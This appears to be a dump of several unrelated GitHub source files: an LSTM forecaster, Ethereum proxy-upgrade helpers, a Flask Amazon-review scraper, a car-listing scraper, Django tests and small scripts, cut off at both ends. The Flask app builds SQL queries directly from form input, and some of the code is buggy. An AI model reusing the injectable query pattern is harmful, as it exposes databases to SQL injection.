data_x.append(a)\n data_y.append(dataset[i + look_back, 0])\n\n return numpy.array(data_x), numpy.array(data_y)\n\n\n\ndef build_model(look_back: int, batch_size: int=1) -> Sequential:\n\n \"\"\"\n The function builds a keras Sequential model\n\n :parameters\n - look_back: The number of previous time steps\n - batch_size: The batch size to use\n\n :return: \n - A Sequential Model object for Keras\n \"\"\"\n model = Sequential()\n model.add(LSTM(64,\n activation='relu',\n batch_input_shape=(batch_size, look_back, 1),\n stateful=True,\n return_sequences=False))\n model.add(Dense(1, activation='linear'))\n model.compile(loss='mean_squared_error', optimizer='adam')\n return model\n\n\ndef generate_forecast(model: Sequential, look_back_buffer: numpy.ndarray, timesteps: int=1, batch_size: int=1):\n\n \"\"\"\n The function generates the final prediction forecase\n\n :parameter \n - model: A Sequential Model object for Keras\n - look_back_buffer: The buffer containing the look back values\n - timesteps: The timestep to use (default 1)\n - batch_size: The batch size to use (default 1)\n\n :return: \n - The forecast prediction\n \"\"\"\n\n forecast_predict = numpy.empty((0, 1), dtype=numpy.float32)\n\n for _ in trange(timesteps, desc='predicting data\\t', mininterval=1.0):\n\n # Use the lookback buffer in order to make a prediciton\n cur_predict = model.predict(look_back_buffer, batch_size)\n\n # Sum the predicition and the result\n forecast_predict = numpy.concatenate([forecast_predict, cur_predict], axis=0)\n\n # Reshape using new axis\n cur_predict = numpy.reshape(cur_predict, (cur_predict.shape[1], cur_predict.shape[0], 1))\n\n # Eliminate the oldest prediction from the buffer\n look_back_buffer = numpy.delete(look_back_buffer, 0, axis=1)\n\n # The the buffer and concatenate it with the latest prediciton\n look_back_buffer = numpy.concatenate([look_back_buffer, cur_predict], axis=1)\n\n return forecast_predict\n\ndef plot_data(dataset: numpy.ndarray, look_back: int, training_prediction: numpy.ndarray,\n test_predict: numpy.ndarray, forecast_predict: numpy.ndarray):\n\n \"\"\"\n Plots the dataset line and the prediction line\n\n\n :paramaters \n - dataset: the original dataset used\n - look_back: the amount of previous time steps\n - training_prediction: the predicted values from 
the training\n - test_predict: the predicted values from the testing\n - forecast_predict: prediction based on all previous predictions\n \"\"\"\n axes = plt.gca()\n\n # Sets the axis title\n if sys.argv[2] == \"1\":\n plt.title('Predicted Marks Average for Student')\n plt.ylabel('Student Mark')\n else:\n plt.title('Predicted Marks Average for Module')\n plt.ylabel('Average Student Marks')\n\n # Set the ticks for the y axis and remove x ticks\n axes.set_ylim([0,100])\n plt.yticks([10, 20, 30, 40, 50, 60, 70, 80, 90, 100])\n axes.set_xticklabels([])\n\n # Plot the original dataset\n plt.plot(dataset, 'b', label='Received Marks Dataset')\n plt.legend(loc='best')\n\n for x in forecast_predict:\n if x > 100:\n x = 100\n\n # Plot the prediction line onto the graph\n plt.plot([None for _ in range(look_back)] +\n [None for _ in training_prediction] +\n [None for _ in test_predict] +\n [x for x in forecast_predict], 'r', label='Marks Prediction Line')\n plt.legend(loc='best')\n\n for x in forecast_predict:\n if x < 50 and sys.argv[2] == \"1\":\n print(\"Student failure possibility\")\n break\n\n plt.axhline(y=50, color='k', linestyle='--', label='50 Percent Line')\n plt.legend(loc='best')\n\n # Draw the final plot\n plt.savefig(\"./graphs/\" + sys.argv[3] + \".png\")\n # plt.show()\n\ndef main():\n\n # Sends of data to be loaded\n filename = \"./data/\" + sys.argv[1]\n dataset, mmscale = load_dataset(filename)\n\n # Split the data into the training and test sets (20% into the look back and 70* into the training set)\n look_back = int(len(dataset) * 0.20)\n training_size = int(len(dataset) * 0.70)\n\n # Call the data split\n train, test = split_dataset(dataset, training_size, look_back)\n\n # Reshaping and creating the datasets ( X = t and Y = t + 1 for the LSTM )\n train_x, train_y = create_dataset(train, look_back)\n test_x, test_y = create_dataset(test, look_back)\n\n # Use numpy to reshape the input to the format [samples, time steps, features]\n train_x = numpy.reshape( train_x, (train_x.shape[0], train_x.shape[1], 1) )\n test_x = numpy.reshape( test_x, (test_x.shape[0], test_x.shape[1], 1) )\n\n # Create the Multilayer Perceptron Model and fit it\n batch_size = 1\n model = build_model(look_back, batch_size=batch_size)\n for _ in trange(100, desc='fitting model\\t', mininterval=1.0):\n model.fit(train_x, train_y, nb_epoch=1, batch_size=batch_size, verbose=0, shuffle=False)\n model.reset_states()\n\n # Get the predictions for the training\n training_prediction = model.predict(train_x, batch_size)\n test_predict = model.predict(test_x, batch_size)\n\n # Complete the general forecasting to create the prediction results to display\n forecast_predict = generate_forecast(model, test_x[-1::], timesteps=100, batch_size=batch_size)\n\n # Invert all datasets and predictions\n dataset = mmscale.inverse_transform(dataset)\n training_prediction = mmscale.inverse_transform(training_prediction)\n train_y = mmscale.inverse_transform([train_y])\n test_predict = mmscale.inverse_transform(test_predict)\n test_y = mmscale.inverse_transform([test_y])\n forecast_predict = mmscale.inverse_transform(forecast_predict)\n\n # Get the root mean square (For testing)\n #train_score = numpy.sqrt(mean_squared_error(train_y[0], training_prediction[:, 0]))\n #print('Train Score: %.2f RMSE' % train_score)\n #test_score = numpy.sqrt(mean_squared_error(test_y[0], test_predict[:, 0]))\n #print('Test Score: %.2f RMSE' % test_score)\n\n plot_data(dataset, look_back, training_prediction, test_predict, forecast_predict)\n\nif __name__ 
== '__main__':\n    main()\n","repo_name":"TimeSeriesPrediction/time-series-server","sub_path":"time-series-analysis-engine.py","file_name":"time-series-analysis-engine.py","file_ext":"py","file_size_in_byte":8811,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"13494416549","text":"from brownie import (\n    accounts,\n    network,\n    config,\n)\n\nimport eth_utils\n\nLOCAL_BLOCKCHAIN_ENVIRONMENTS = [\"development\", \"hardhat\", \"local-ganache\"]\n\n\ndef get_account(index=None, id=None):\n    if index:\n        return accounts[index]\n    if id:\n        return accounts.load(id)\n    if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n        return accounts[0]\n    return accounts.add(config[\"wallets\"][\"from_key\"])\n\n\ndef encode_function_data(initializer=None, *args):\n    # initializer=box.store, 1,2,3,4,5,6,7 etc (for any optional args to pass to initializer function)\n    # returns the encoded bytes or an empty hex string if no args\n    if len(args) == 0 or not initializer:\n        return eth_utils.to_bytes(hexstr=\"0x\")\n    return initializer.encode_input(*args)\n\n\ndef upgrade(\n    account,\n    proxy,\n    new_implementation_address,\n    proxy_admin_contract=None,\n    initializer=None,\n    *args,\n):\n    transaction = None\n    if proxy_admin_contract:\n        if initializer:\n            encoded_function_call = encode_function_data(initializer, *args)\n            transaction = proxy_admin_contract.upgradeAndCall(\n                proxy.address,\n                new_implementation_address,\n                encoded_function_call,\n                {\"from\": account},\n            )\n        else:\n            transaction = proxy_admin_contract.upgrade(\n                proxy.address, new_implementation_address, {\"from\": account}\n            )\n    else:\n        if initializer:\n            encoded_function_call = encode_function_data(initializer, *args)\n            transaction = proxy.upgradeToAndCall(\n                new_implementation_address, encoded_function_call, {\"from\": account}\n            )\n        else:\n            transaction = proxy.upgradeTo(new_implementation_address, {\"from\": account})\n    return transaction\n","repo_name":"Valodax/Web3-Python","sub_path":"proxy-upgrade/scripts/helpful_scripts.py","file_name":"helpful_scripts.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1020623000","text":"import random\nimport sqlite3\nimport time\nfrom math import exp, pi, sqrt\nfrom typing import List, Optional, Tuple\n\nfrom numbsql import create_function, sqlite_udf\n\n\n@sqlite_udf # type: ignore[misc]\ndef normal(x: float, mu: float, sigma: float) -> Optional[float]:\n    c = 1.0 / (sigma * sqrt(2.0 * pi))\n    return c * exp(-0.5 * ((x - mu) / sigma) ** 2.0)\n\n\ndef oldnormal(x: float, mu: float, sigma: float) -> float:\n    c = 1.0 / (sigma * sqrt(2.0 * pi))\n    return c * exp(-0.5 * ((x - mu) / sigma) ** 2.0)\n\n\nif __name__ == \"__main__\":\n    con = sqlite3.connect(\":memory:\")\n    con.execute(\"CREATE TABLE t (random_numbers DOUBLE PRECISION)\")\n\n    random_numbers: List[Tuple[float]] = [(random.random(),) for _ in range(50000)]\n    con.executemany(\"INSERT INTO t VALUES (?)\", random_numbers)\n\n    # new way of registering C functions\n    create_function(con, \"normal\", 3, normal, deterministic=True)\n\n    # old way\n    con.create_function(\"oldnormal\", 3, oldnormal)\n    query1 = \"select normal(random_numbers, 0.0, 1.0) from t\"\n    query2 = \"select oldnormal(random_numbers, 0.0, 1.0) from t\"\n\n    start1 = time.time()\n    exe1 = con.execute(query1)\n    result1 = list(exe1)\n    t1 = time.time() - start1\n\n    start2 = time.time()\n    exe2 = con.execute(query2)\n    result2 = 
list(exe2)\n    t2 = time.time() - start2\n\n    print(result1 == result2)\n    print(f\"t1 == {t1:.2f}\")\n    print(f\"t2 == {t2:.2f}\")\n","repo_name":"cpcloud/numbsql","sub_path":"examples/scalar.py","file_name":"scalar.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"76"} +{"seq_id":"29052548034","text":"from database import connectToDatabase\nfrom product import getProduct\nfrom review import *\nfrom label import prepareLabels\nfrom bs4 import BeautifulSoup\nfrom flask import Flask, request, jsonify\nimport json\nimport html\n\napp = Flask(__name__)\ncur = connectToDatabase() #create a universal cursor (used by all methods) for the database\n\n\ndef returnResult(**kwargs):\n    \"\"\"returns the data obtained from the database query and formats it into JSON\"\"\"\n    response = jsonify(kwargs)\n    response.headers.add('Access-Control-Allow-Origin', '*')\n    return response\n\n@app.route('/scraping', methods=['POST', \"GET\"])\ndef crawl():\n    \"\"\"Crawls Amazon products and stores the result in a database\"\"\"\n    url = request.form['key'] #get the URL from the AJAX call\n    try:\n        cap = [i for i, c in enumerate(url) if c == \"/\"][2] #checks for the second occurence of \"/\" to find the cap that separates the domain from the rest of the URL\n        if url[:cap] != 'https://www.amazon.com': #if it is not an Amazon.com link, return an error\n            return returnResult(result=\"InvalidURL\")\n    except IndexError: #if it does not resemble the amazon domain, also return an error\n        return returnResult(result=\"InvalidURL\")\n    pageSource = getHTML(url) #get the HTML code of the page\n    bs = BeautifulSoup(pageSource, 'html.parser') #and create a BS object for parsing\n    if cur == 0: #if the connection to the database failed, return an error\n        return returnResult(result=\"InvalidDatabaseConnection\")\n    product = getProduct(bs, cur) #get the product information\n    if type(product) == str: #if it is a duplicate, product name is returned since no product was stored in the database. 
Also, no reviews are scraped (already stored in the database)\n cur.execute(f\"SELECT * FROM products WHERE product_name = '{product}'\")\n product = cur.fetchall()[0][0] #get the id of the product and return it for results.php since it must be put into the query string\n return returnResult(result=\"IntegrityError\", product_id=product)\n else: #else, scrape the reviews of the prodcut\n for i in range(1, 6): #go through each star-review (i.e., 1 star reviews, 2 stars reviews, etc.)\n getReviews(bs, cur, product, 1, i) #store the reviews in the database\n return returnResult(result=\"Success\", product_id=product)\n\n@app.route('/filter', methods=['POST', \"GET\"])\ndef applyFilter():\n \"\"\"use the filter values and return the reviews that match the description\"\"\"\n product_id = request.form['product_id']\n label = html.escape(request.form['target']) #escape the characters \n if label != \"0\": #if a label was passed into the AJAX call, the reviews table must be joined with the reviews_labels and labels, since they hold the information on which review has which label\n query_string = f\"SELECT * FROM reviews r LEFT JOIN reviews_labels rl ON r.id = rl.review_id LEFT JOIN labels l ON rl.label_id = l.id WHERE r.product_id = '{product_id}'\"\n query_string += f\" AND l.label = '{label}' AND l.target = '1'\" \n prepareLabels(cur, product_id, label) \n else: #if no label was passed, the reviews table is sufficient\n query_string = f\"SELECT * FROM reviews r WHERE r.product_id = '{product_id}'\"\n stars = json.loads(request.form['star'])\n if len(stars) != 0: #iterate through each star and add its condition to the query string\n star_filter = \" AND (\"\n for i in stars:\n star_filter += f\"r.stars = '{i}' OR \" #OR because its not exclusive\n query_string += star_filter[:-4]+\")\" #remove the last OR that was added and close the parenthesis\n start_date = request.form['start']\n if start_date != \"0\":\n query_string += f\" AND r.published >= '{start_date}'\"\n end_date = request.form['end']\n if end_date != \"0\":\n query_string += f\" AND r.published <= '{end_date}'\"\n cur.execute(query_string) #execute the query \n results = cur.fetchall() #and gather the results\n cur.execute(f\"SELECT * FROM products WHERE id = '{product_id}'\") #also, the webpage displays information about the prodcut, so return this as well\n product = cur.fetchall()[0]\n if len(results) == 0: #if no reviews match the filter, just return the product information\n return returnResult(result=\"EmptyResults\", name=product[1], brand=product[2], price=product[3], product_stars=product[4], num_reviews=product[5])\n else: #if reviews match it, return both\n return returnResult(result=\"Success\", stars=[i[1] for i in results], content=[html.unescape(i[2]) for i in results], published=[i[3] for i in results], \\\n name=product[1], brand=product[2], price=product[3], product_stars=product[4], num_reviews=product[5])\n\n\n","repo_name":"Mato-T/Web-App","sub_path":"Python/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32271584954","text":"\nn, V = map(int, input().split())\nv = [int(x) for x in input().split()]\n\nmid = n // 2\n\ndef solve(len, step):\n arr = []\n for i in range(len):\n arr.append(v[i + step])\n\n F = [0] * len\n s = []\n def snp(i):\n if i == len:\n sum = 0\n for j in range(len):\n if F[j] == 1:\n sum += arr[j]\n s.append(sum)\n return\n F[i] = 0\n snp(i+1)\n F[i] = 1\n 
snp(i+1)\n snp(0)\n return s\n\nsum1 = solve(mid, 0)\nsum2 = solve(n - mid, mid)\nMax = 0\n\nfor i in range(len(sum1)):\n for j in range(len(sum2)):\n if sum1[i] + sum2[j] <= V:\n Max = max(Max, sum1[i] + sum2[j])\n\nprint(Max)\n\n# F = [0] * n\n# Max = 0\n#\n# def snp(i):\n# global Max\n# s = []\n# if i == n:\n# sum = 0\n# for j in range(n):\n# if F[j] == 1:\n# sum += v[j]\n# if sum <= V:\n# Max = max(Max, sum)\n# return\n# F[i] = 0\n# snp(i+1)\n# F[i] = 1\n# snp(i+1)\n#\n# snp(0)\n# print(Max)","repo_name":"LecterW/Introductory","sub_path":"CHUNGCAKE_Banhchung.py","file_name":"CHUNGCAKE_Banhchung.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8030112020","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 2 14:29:05 2015\n@author: cgilbert\n\"\"\"\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\ndef getContentFromUrl(url):\n\t# Execute a request to get the content from a web page\n\trequest = requests.get(url)\n\t# Parse the document\n\tsoup = BeautifulSoup(request.text, 'html.parser')\n\treturn soup\n\n#def lienFromUrl(url)\n\nurl='http://www.leboncoin.fr/voitures/offres/ile_de_france/?f=a&th=1&q=Renault+Zo%C3%A9'\n\ndef getLienFromUrl(url):\n soup = getContentFromUrl(url);\n list_bloc=soup.find(\"div\", { \"class\" : \"list-lbc\" })\n list_article=list_bloc.findAll('a',href=True)\n liste_lien=[]\n for article in list_article:\n lien=str(article['href'])\n liste_lien.append(lien)\n return liste_lien\n\nliste_lien=getLienFromUrl(url)\n\ndef getVersionFromSoup(soup_lien):\n content=str(soup_lien.find(\"div\", { \"class\" : \"content\" }))\n searchObjVersion = re.search( r'intens|life|zen', content, re.M|re.I)\n if not(searchObjRenault is None):\n version=(searchObjVersion.group()).lower()\n else:\n version=\"version non renseignée\"\n return version\n\ndef getPriceFromSoup(soup):\n price=soup.find(\"div\", { \"class\" : \"lbcParams withborder\" }).find(\"span\", { \"class\" : \"price\" })\n return(str(price['content']))\n\ndef getDateFromSoup(soup):\n release_date=soup.find(\"div\", { \"class\" : \"lbcParams criterias\" }).find(\"td\", { \"itemprop\" : \"releaseDate\" }).string\n return str(int(release_date))\n\ndef getKmFromSoup(soup):\n km_dirty=soup.find(\"div\", { \"class\" : \"lbcParams criterias\" }).findAll(\"td\")[3].string\n km=km_dirty.replace(\" \",\"\").replace(\"KM\",\"\")\n return km\n\ndef getSellerFromSoup(soup):\n param=soup.find(\"div\", { \"class\" : \"upload_by\" }).find(\"span\", { \"class\" : \"ad_pro\" })\n if param is None:\n seller='particulier'\n else:\n seller='pro'\n return seller\n\ndef getCoteFromVersionDate(version,date):\n non_decimal = re.compile(r'[^\\d.]+')\n url_cote='http://www.lacentrale.fr/cote-auto-renault-zoe-'+version+'+charge+rapide-'+date+'.html'\n soup_dirty=getContentFromUrl(url_cote)\n cote_dirty=soup_dirty.find(\"span\", { \"class\" : \"Result_Cote arial tx20\" }).string\n return(non_decimal.sub('', cote_dirty))\n \n\n\n\n\nresult_search=[]\n\nfor lien in liste_lien:\n \n soup_lien=getContentFromUrl(lien)\n titre=str(soup_lien.find(\"div\", { \"class\" : \"header_adview\" })) \n searchObjRenault = re.search( r'renault|zoe|zoé', titre, re.M|re.I)\n \n if not(searchObjRenault is None):\n \n version=getVersionFromSoup(soup_lien)\n price=getPriceFromSoup(soup_lien)\n km=getKmFromSoup(soup_lien)\n date=getDateFromSoup(soup_lien)\n seller=getSellerFromSoup(soup_lien)\n 
cote=getCoteFromVersionDate(version,date)\n\n \n for i in range(len(versions)):\n if(version==versions[i]):\n cote=cotes[i]\n \n if price>cote:\n commentaire='oui'\n elif price cote ?']\ndf\n\n\n\n# url_zoe='http://www.lacentrale.fr/cote-auto-renault-zoe-intens+charge+rapide-2013.html'\n# soup_zoe_dirty=getContentFromUrl(url_zoe)\n# cote_zoe_dirty=soup_zoe.find(\"span\", { \"class\" : \"Result_Cote arial tx20\" }).string\n# non_decimal = re.compile(r'[^\\d.]+')\n# cote_zoe = non_decimal.sub('', cote_zoe))\n# url='http://www.leboncoin.fr/voitures/827471549.htm?ca=12_s'\n# soup = getContentFromUrl(url)\n\n# def getSellerFromSoup(soup):\n# param=soup.find(\"div\", { \"class\" : \"upload_by\" }).find(\"span\", { \"class\" : \"ad_pro\" }).string\n# if param is None:\n# seller='particulier'\n# else:\n# seller='pro'\n \n# return seller\n ","repo_name":"rachidalili/MS-BGD2015","sub_path":"Cyril_Gilbert/Lesson4/exo_dom_lesson4.py","file_name":"exo_dom_lesson4.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"76"} +{"seq_id":"24791996890","text":"from django.test import TestCase\nimport pytest\nfrom car_rental_app.models import ClientAsk, Client, CarDamage, DamagePart, ReservationOptions\nfrom django.contrib.auth.models import User, Permission\n# Create your tests here.\n\n#dodawanie zapytania\n@pytest.mark.django_db\ndef test_client_ask(client):\n response = client.post('/res_inq_add/', {'car_class': 'mpv', 'start_date': '2021-02-28', 'end_date': '2021-03-02'})\n print(response.content)\n assert ClientAsk.objects.filter(start_date='2021-02-28')\n\n@pytest.mark.django_db\ndef test_add_client(client, authorized_user):\n client.force_login(authorized_user)\n response = client.post('/client_form/', {'name': 'Andrzej', 'surname': 'Golota', 'strname' : 'Koeniga', 'homenum' : '23',\n 'flatnum' : '23', 'idnum' : 'AWX674823', 'dlnum' : '4563/23/8947', 'pesel' : '56022407008',\n 'email' : 'rossfriends@fox.tv', 'phonenum' : '513434434'})\n print(response.content)\n assert Client.objects.filter(flatnum='23')\n\n@pytest.mark.django_db\ndef test_add_car_missing_permission(client, unauthorized_user):\n client.force_login(unauthorized_user)\n response = client.post('/Add_car', {'brand':'opel'})\n print(response.content)\n assert response.status_code == 403\n\n@pytest.mark.django_db\ndef test_add_damage_part(client, authorized_user1):\n client.force_login(authorized_user1)\n response = client.post('/part_add/', {'part': 'front window'})\n print(response.content)\n assert DamagePart.objects.filter(part='front window')\n\n@pytest.mark.django_db\ndef test_add_damage_car(client, authorized_user1, test_car, test_client, test_part):\n client.force_login(authorized_user1)\n response = client.post(\"/Add_damage\", {'date': '2021-02-24', 'd_status': 'unreapaird', 'title': 'Stolen mirror', 'd_note': 'Left mirror has been stolen on parking lot', 'car': [test_car.id], 'driver': [test_client.id], 'damage_part': test_part.id})\n print(response.content)\n assert CarDamage.objects.filter(date=\"2021-02-24\")\n\n# @pytest.mark.django_db\n# def test_update_reservation(client, unauthorized_user, test_reservation):\n# client.force_login(unauthorized_user)\n# response = client.post(f'/Reservation_Edit/{test_reservation.id}', {'start_date':'2021-01-12'})\n# print(response.content)\n# assert response.status_code == 403\n#\n# @pytest.mark.django_db\n# def test_add_option(client, authorized_user1, test_reservation):\n# 
client.force_login(authorized_user1)\n# response = client.post('/add_option', {'reservation':test_reservation.id, 'child_seat':'a', 'number_of_cs':'2', 'additional_driver':'NO', 'abolition':'NO', 'insurence':'NO'})\n# print(response.content)\n# assert ReservationOptions.objects.filter(reservation_id=f\"{test_reservation.id}\")","repo_name":"PiotrWyso/Car_Rental_App","sub_path":"car_rental_app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5753096800","text":"n1 = int(input('Um valor: '))\nn2 = int(input('Outro valor: '))\nprint('A soma vale {}'.format(n1 + n2))\n\n\n\"\"\"\n Desafios\n 005 Faça um programa que leia um número inteiro e mostra na tela o seu sucessoer e antecessor.\n 006 Crie um algoritmo que leia um número que mostra, seu dobro, triplo e raiz quadrada.\n 007 Desenvolva um programa que leia duas notas e mostre a média.\n 008 Escreve um programa que leia um valor em metros e converta para centimetros e milimetros.\n 009 Faça um programa q leia um número inteiro qualquer e mostra na tela sua tabuada.\n 010 Crie um programa que leia quanto dinheiro uma pessoa tem e mostre quantos dólares ela pode comprar US$ 1,00 = R$ 3,27\n 011 Faça um programa que leia a largura e a altura de uma parede em metros, calcule sua área e a quantidade de tinta necessária\n para pintá-la, sabendo que cada litro de tinta pinta uma área de 2m².\n 012 Faça um algoritmo que leia uma preço de um produto e mostre seu novo preço com 5% de desconto.\n 013 Faça um algoritmo que leia o salário de um fuincionário e mostr seu novo salário com aumento de 15%;\n\"\"\"\n","repo_name":"engenheiropierre/cursopython","sub_path":"exercicios/aula07a.py","file_name":"aula07a.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30153890432","text":"import numpy as np\nfrom scipy.ndimage import gaussian_filter\nfrom noise import pnoise1,pnoise2\nfrom scipy.interpolate import griddata\n\nclass terrain:\n def __init__(self,mapWidth,mapHeight,widthScale,heightScale):\n self.mapWidth = mapWidth\n self.mapHeight = mapHeight\n self.meshScale = [widthScale,heightScale,1]\n self.gridX = np.linspace(-(mapWidth-1)/2,(mapWidth-1)/2,mapWidth)*widthScale\n self.gridY = np.linspace(-(mapHeight-1)/2,(mapHeight-1)/2,mapHeight)*heightScale\n self.gridX,self.gridY = np.meshgrid(self.gridX,self.gridY)\n def loadTerrain(self,gridZFile):\n self.gridZ = np.load(gridZFile)\n def robotHeightMap(self,position,heading,mapWidth,mapHeight,mapScale):\n maxRadius = np.sqrt((mapWidth-1)**2+(mapHeight-1)**2)*mapScale/2.\n vecX = self.gridX.reshape(-1)-position[0]\n vecY = self.gridY.reshape(-1)-position[1]\n indices = np.all(np.stack((np.abs(vecX)<=(maxRadius+self.meshScale[0]),np.abs(vecY)<=(maxRadius+self.meshScale[1]))),axis=0)\n vecX = vecX[indices]\n vecY = vecY[indices]\n vecZ = self.gridZ.reshape(-1)[indices]\n relativeX = vecX*np.cos(heading)+vecY*np.sin(heading)\n relativeY = -vecX*np.sin(heading)+vecY*np.cos(heading)\n rMapX = np.linspace(-(mapWidth-1)/2.,(mapWidth-1)/2.,mapWidth)*mapScale\n rMapY = np.linspace((mapHeight-1)/2.,-(mapHeight-1)/2.,mapHeight)*mapScale\n points = np.stack((relativeX,relativeY)).transpose()\n rMapX,rMapY = np.meshgrid(rMapX,rMapY)\n return griddata(points, vecZ, (rMapX,rMapY))-position[2]\n\nif __name__==\"__main__\":\n ter = 
terrain(1,2,3,4)","repo_name":"robomechanics/clifford_pybullet","sub_path":"cemOptimiziation/terrain.py","file_name":"terrain.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"25384501751","text":"import boto3\n\ndef send_message():\n sqs_client = boto3.client('sqs', region_name='us-east-1')\n queue_url='https://sqs.us-east-1.amazonaws.com/774910682050/fila-teste'\n response = sqs_client.send_message(\n QueueUrl=queue_url,\n DelaySeconds=10,\n MessageBody=(\n 'Hello world!'\n )\n )\n print(response)\n\nif __name__ == '__main__':\n\n response = send_message()","repo_name":"lucascavalcan/aws-sqs-boto","sub_path":"sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20626717508","text":"import numpy as np\nimport pandas as pd\n\nmodel = np.load(\"model.npy\")\nw = model\ntest = pd.read_csv(r\"..\\test.csv\", header=None)\nt = test[test[1] == \"PM2.5\"]\nt.drop([0, 1], axis=1, inplace=True)\nt = np.array(t, float)\nt = np.concatenate((np.ones((t.shape[0], 1)), t), axis=1)\n\nres = np.dot(t, w)\n1+1","repo_name":"bgbofficial/NTU-ML-HW","sub_path":"hw1/temp/pridict.py","file_name":"pridict.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38004217115","text":"\r\nimport googlesearch\r\nfrom tkinter import *\r\ntry:\r\n from googlesearch import search\r\nexcept ImportError:\r\n print(\"No module named 'google' found\")\r\n\r\n\r\n\r\nstruct=Tk()\r\nstruct.geometry(\"354x400\") #Defining Size of GUI box\r\nstruct.title(\"My Search Engine\") \r\nlabel=Label(struct,text=\"Personal Search Engine\",bg=\"teal\",fg=\"white\",font=(\"Times\",20,\"bold\"))\r\nlabel.pack(side=TOP) \r\nstruct.config(background=\"teal\")\r\nquery=StringVar()\r\ncountry=StringVar()\r\nnum=IntVar()\r\nstart=IntVar()\r\nstop=IntVar()\r\npause=IntVar()\r\ntld=StringVar()\r\ndef mysearch():\r\n try:\r\n query1 =query.get()\r\n country1 =country.get()\r\n num1 =num.get()\r\n start1 =start.get()\r\n stop1 =stop.get()\r\n pause1 =pause.get()\r\n tld1=tld.get()\r\n file1 = open(query1+\".txt\",\"w\")\r\n except:\r\n clear()\r\n return 0\r\n list1=[]\r\n for j in search(query1 ,country=country1,safe=\"off\", num=num1,start=start1, stop=stop1, pause=pause1):\r\n file1.writelines(j)\r\n file1.writelines(\"\\n\")\r\n #list1.append(j)\r\n print(j)\r\n \r\ndef clear():\r\n query.set(\"\")\r\n country.set(\"\")\r\n num.set(0)\r\n start.set(0)\r\n stop.set(0)\r\n pause.set(0)\r\n tld.set(\"\")\r\n \r\nlabel=Label(struct,text=\"Enter here to 
search\",bg=\"teal\",fg=\"white\",font=(\"Times\",15,\"bold\"))\r\nlabel.place(x=50,y=100)\r\nlabel=Label(struct,text=\"query\",bg=\"teal\",fg=\"white\",font=(\"Times\",10,\"bold\"))\r\nlabel.place(x=50,y=130)\r\nlabel=Label(struct,text=\"country\",bg=\"teal\",fg=\"white\",font=(\"Times\",10,\"bold\"))\r\nlabel.place(x=50,y=160)\r\nlabel=Label(struct,text=\"num\",bg=\"teal\",fg=\"white\",font=(\"Times\",10,\"bold\"))\r\nlabel.place(x=50,y=190)\r\nlabel=Label(struct,text=\"start\",bg=\"teal\",fg=\"white\",font=(\"Times\",10,\"bold\"))\r\nlabel.place(x=50,y=220)\r\nlabel=Label(struct,text=\"stop\",bg=\"teal\",fg=\"white\",font=(\"Times\",10,\"bold\"))\r\nlabel.place(x=50,y=250)\r\nlabel=Label(struct,text=\"pause\",bg=\"teal\",fg=\"white\",font=(\"Times\",10,\"bold\"))\r\nlabel.place(x=50,y=280)\r\nlabel=Label(struct,text=\"tld\",bg=\"teal\",fg=\"white\",font=(\"Times\",10,\"bold\"))\r\nlabel.place(x=50,y=310)\r\n\r\n\r\n\r\n\r\n\r\n\r\nenter=Entry(struct,font=(\"Times\",10,\"bold\"),textvar=query,width=30,bd=2,bg=\"white\")\r\nenter.place(x=120,y=130)\r\nenter1=Entry(struct,font=(\"Times\",10,\"bold\"),textvar=country,width=30,bd=2,bg=\"white\")\r\nenter1.place(x=120,y=160)\r\nenter=Entry(struct,font=(\"Times\",10,\"bold\"),textvar=num,width=30,bd=2,bg=\"white\")\r\nenter.place(x=120,y=190)\r\nenter1=Entry(struct,font=(\"Times\",10,\"bold\"),textvar=start,width=30,bd=2,bg=\"white\")\r\nenter1.place(x=120,y=220)\r\nenter=Entry(struct,font=(\"Times\",10,\"bold\"),textvar=stop,width=30,bd=2,bg=\"white\")\r\nenter.place(x=120,y=250)\r\nenter1=Entry(struct,font=(\"Times\",10,\"bold\"),textvar=pause,width=30,bd=2,bg=\"white\")\r\nenter1.place(x=120,y=280)\r\nenter1=Entry(struct,font=(\"Times\",10,\"bold\"),textvar=tld,width=30,bd=2,bg=\"white\")\r\nenter1.place(x=120,y=310)\r\n\r\n\r\n\r\nbutton1=Button(struct,text=\"clear\",font=(\"Times\",10,\"bold\"),width=15,bd=2,command=clear)\r\nbutton1.place(x=70,y=340)\r\nbutton=Button(struct,text=\"Search\",font=(\"Times\",10,\"bold\"),width=15,bd=2,command=mysearch)\r\nbutton.place(x=200,y=340)\r\nstruct.mainloop()\r\n\r\nfile1.close()","repo_name":"fawzimestrah/IOT_GoogleEngine","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10794339796","text":"from collections import deque\nn, m, a, b, k = map(int, input().split())\ngraph = [ [0]*(m+1) for _ in range(n+1) ] \nfor _ in 